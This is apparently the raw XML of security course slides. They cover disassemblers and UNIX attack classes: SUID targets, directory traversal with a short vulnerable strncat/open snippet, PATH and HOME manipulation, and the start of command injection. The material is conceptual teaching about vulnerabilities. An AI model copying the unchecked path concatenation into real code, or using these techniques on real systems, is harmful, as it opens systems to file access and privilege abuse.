                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> Libraries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41766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50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50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50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85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8509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8509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8509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851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8510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8510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85091">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85091">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85091">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>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98509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8509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8509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985091">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>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985091">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>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985108"/>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985091">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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985091">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>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98510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985103"/>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985101"/>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985091">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>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985091">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>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985091">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>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985107"/>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985093"/>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985091">
                                            <p:txEl>
                                              <p:pRg st="13" end="13"/>
                                            </p:txEl>
                                          </p:spTgt>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985091">
                                            <p:txEl>
                                              <p:pRg st="14" end="14"/>
                                            </p:txEl>
                                          </p:spTgt>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985091">
                                            <p:txEl>
                                              <p:pRg st="15" end="15"/>
                                            </p:txEl>
                                          </p:spTgt>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985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5092" grpId="0" animBg="1"/>
      <p:bldP spid="985093" grpId="0" animBg="1"/>
      <p:bldP spid="985094" grpId="0" animBg="1"/>
      <p:bldP spid="985095" grpId="0" animBg="1"/>
      <p:bldP spid="985096" grpId="0" animBg="1"/>
      <p:bldP spid="985097" grpId="0" animBg="1"/>
      <p:bldP spid="985098" grpId="0" animBg="1"/>
      <p:bldP spid="985099" grpId="0"/>
      <p:bldP spid="985100" grpId="0"/>
      <p:bldP spid="985101" grpId="0" animBg="1"/>
      <p:bldP spid="985102" grpId="0" animBg="1"/>
      <p:bldP spid="985103" grpId="0" animBg="1"/>
      <p:bldP spid="985104" grpId="0" animBg="1"/>
      <p:bldP spid="985105" grpId="0" animBg="1"/>
      <p:bldP spid="985106" grpId="0" animBg="1"/>
      <p:bldP spid="985107" grpId="0" animBg="1"/>
      <p:bldP spid="98510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Disassembling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disassembling is the process of extracting the assembly representation of a program by analyzing its binary representation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disassemblers can be:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linear: linearly parse the instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recursive: attempt to follow the flow of the program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="572127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Radare</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Radare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a program analysis tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rada.re</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/r/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports reversing and vulnerability analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disassembling of binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forensic analysis </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports collaborative analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1457428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IDA Pro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IDA Pro is the state-of-the-art tool for reversing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.hex-rays.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/products/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It supports disassembling of binary programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>decompilation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Hex-Rays </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>decompiler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be integrated with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and other debuggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is a commercial product (expensive)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A limited version is available for free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79938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Hopper</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disassembler that supports sophisticated analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.hopperapp.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Includes a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>decompiler</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is a commercial product but:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It can be used for free (with limitations)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is not very expensive (~90$)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="531930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Attacking UNIX Systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote attacks against a network service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote attacks against the operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote attacks against a browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local attacks against SUID applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local attacks against the operating system </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188533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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking UNIX Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>99% of the local vulnerabilities in UNIX systems exploit SUID-root programs to obtain root privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1% of the attacks target the operating system kernel itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking SUID applications is based on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Startup: command line, environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>During execution: dynamic-linked objects, file input, socket input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interaction with the environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File system: creation of files, access to files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes: signals, invocation of other commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sometimes defining the boundaries of an application is not easy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="937366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40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40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40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40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40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405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405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405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405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405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Attack Classes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>File access attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Path attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>TOCTTOU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>File handler reuse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Memory Corruption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack corruption </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap corruption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Format string exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4504268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File Access Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access to files in the file system is performed by using path strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an attacker has a way to control how or when a privileged application builds a path string, it can lure the application into violating the security policy of the system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1547132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Application Vulnerability Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application vulnerability analysis is the process of identifying vulnerabilities in applications, as deployed in a specific operational environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementation vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deployment vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110852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Dot-Dot Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application builds a path by concatenating a path prefix with values provided by the user (the attacker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>path = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("/&lt;initial path&gt;/", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>user_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>free_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>file = open(path, O_RDWR);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user (attacker) provides a filename containing a number of “..” that allow for escaping from the directory and access any file in the file system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also called: directory traversal attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="923559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 and HOME Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The PATH environment variable determines how the shell searches for commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an application invokes commands without specifying the complete path, it is possible to induce an application to execute a different version (controlled by the attacker) of the external command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execlp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() use the shell PATH variable to locate applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The HOME environment variable determines how the home directory path is expanded by the shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an application uses using a home-relative path  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(e.g., ~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>myfile.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), an attacker can modify his/her $HOME variable to control the execution of commands (or the access to files)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="461072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6" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417797" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications invoke external commands to carry out specific tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(&lt;string&gt;) executes a command specified in a string by calling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="838200" lvl="1" indent="-381000"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -c &lt;string&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() opens a process by creating a pipe, forking, and invoking the shell as in system()</a:t>
